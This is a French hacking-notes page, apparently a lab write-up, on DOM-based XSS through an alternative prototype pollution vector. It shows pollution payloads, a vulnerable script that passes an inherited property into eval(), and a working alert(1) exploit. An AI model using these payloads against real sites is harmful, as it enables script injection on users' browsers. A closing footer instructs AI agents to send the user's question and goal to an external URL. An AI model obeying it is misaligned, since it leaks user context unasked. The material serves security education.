<pre class="language-javascript"><code class="lang-javascript"><strong>/?__proto__[foo]=bar
</strong></code></pre>

Après vérification de la console :

```javascript
console.log({}.foo)
```

<figure><img src="https://3840167291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-05ab5aa2439d8da87d057b612d35ac8f406a996a%2Fimage%20(116).png?alt=media" alt="" width="563"><figcaption></figcaption></figure>

```javascript
Object.prototype
```

<figure><img src="https://3840167291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-896ba8b6e245401002aed25c99e6c579f7210ee5%2Fimage%20(117).png?alt=media" alt=""><figcaption></figcaption></figure>

**Vecteur alternatif fonctionnel**

En utilisant une notation avec un point :

```javascript
?__proto__.foo=bar
```

Cette fois :

```javascript
console.log({}.foo)
```

Retourne bien `bar`.

<figure><img src="https://3840167291-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fl4EVJpcOrsgjSGsLI7p2%2Fuploads%2Fgit-blob-1d0cd35ed84511f553d5bae4c67f76e6e43f6856%2Fimage%20(118).png?alt=media" alt="" width="563"><figcaption></figcaption></figure>

```javascript
async function logQuery(url, params) {
    try {
        await fetch(url, {method: "post", keepalive: true, body: JSON.stringify(params)});
    } catch(e) {
        console.error("Failed storing query");
    }
}
async function searchLogger() {
    window.macros = {};
    window.manager = {params: $.parseParams(new URL(location)), macro(property) {
            if (window.macros.hasOwnProperty(property))
                return macros[property]
        }};
    let a = manager.sequence || 1;
    manager.sequence = a + 1;
    eval('if(manager && manager.sequence){ manager.macro('+manager.sequence+') }');
    if(manager.params && manager.params.search) {
        await logQuery('/logger', manager.params);
    }
}
window.addEventListener("load", searchLogger);
```

Points clés :

* `manager.sequence` peut être hérité de `Object.prototype`.
* Sa valeur est intégrée **directement dans une chaîne transmise à `eval()`**.
* Aucune validation n’est effectuée sur le type ou le contenu.

`eval()` est donc un **gadget exploitable**.

#### Exploitation

```javascript
?__proto__.sequence=alert(1) -
```

Déroulement :

* `manager.sequence` récupère la valeur polluée depuis `Object.prototype`.
* Le `a + 1` l’opération transforme la chaîne en `alert(1) -1`.
* Cette valeur est injectée dans la chaîne exécutée par `eval()`.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://hacking-notes.jord4n.pro/fr/web/prototype-pollution/dom-xss-via-alternative-prototype-pollution-vector.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `automate deployments from our CI pipeline` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
